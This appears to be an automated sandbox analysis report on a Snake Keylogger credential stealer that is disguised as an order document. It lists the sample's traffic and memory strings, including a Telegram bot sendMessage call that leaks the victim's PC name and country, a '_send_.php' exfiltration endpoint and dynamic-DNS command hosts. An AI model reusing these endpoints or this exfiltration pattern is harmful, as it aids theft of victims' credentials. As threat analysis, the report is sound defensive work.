                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2014/03/2025%20/%2006:54:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 07:49:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: svchost.exe, 00000005.00000002.2366614968.00000202B9483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.15.drString found in binary or memory: http://upx.sf.net
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: svchost.exe, 00000005.00000003.1203600977.00000202B92A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 54966 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54968
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54970 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54971
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54970
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54966
                Source: unknownNetwork traffic detected: HTTP traffic on port 54968 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54971 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:54971 version: TLS 1.2

                System Summary

                barindex
                Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sampleStatic PE information: Filename: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_03163E1C0_2_03163E1C
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_057987E00_2_057987E0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_05791AE40_2_05791AE4
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_057987D00_2_057987D0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_057922180_2_05792218
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_057922080_2_05792208
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_057914580_2_05791458
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_05793DD00_2_05793DD0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_058744E00_2_058744E0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_0587661E0_2_0587661E
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_05871A900_2_05871A90
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_058714D00_2_058714D0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_058714E00_2_058714E0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_058792630_2_05879263
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_05873A780_2_05873A78
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280D2784_2_0280D278
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_028053704_2_02805370
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280C1464_2_0280C146
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280C7384_2_0280C738
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280C4684_2_0280C468
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280CA084_2_0280CA08
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280E9884_2_0280E988
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_028069A04_2_028069A0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_028029E04_2_028029E0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280CFA94_2_0280CFA9
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_02806FC84_2_02806FC8
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280CCD84_2_0280CCD8
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_02809DE04_2_02809DE0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280F9794_2_0280F979
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280E97A4_2_0280E97A
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_02803E094_2_02803E09
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A96684_2_066A9668
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A51484_2_066A5148
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A1FA84_2_066A1FA8
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A9D904_2_066A9D90
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A2A904_2_066A2A90
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A18504_2_066A1850
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AD6604_2_066AD660
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AD6704_2_066AD670
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AE7CF4_2_066AE7CF
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AE7D04_2_066AE7D0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A94484_2_066A9448
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AF4D84_2_066AF4D8
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AD2184_2_066AD218
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AE36A4_2_066AE36A
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AE3784_2_066AE378
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AF0714_2_066AF071
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A00404_2_066A0040
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A003F4_2_066A003F
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AF0804_2_066AF080
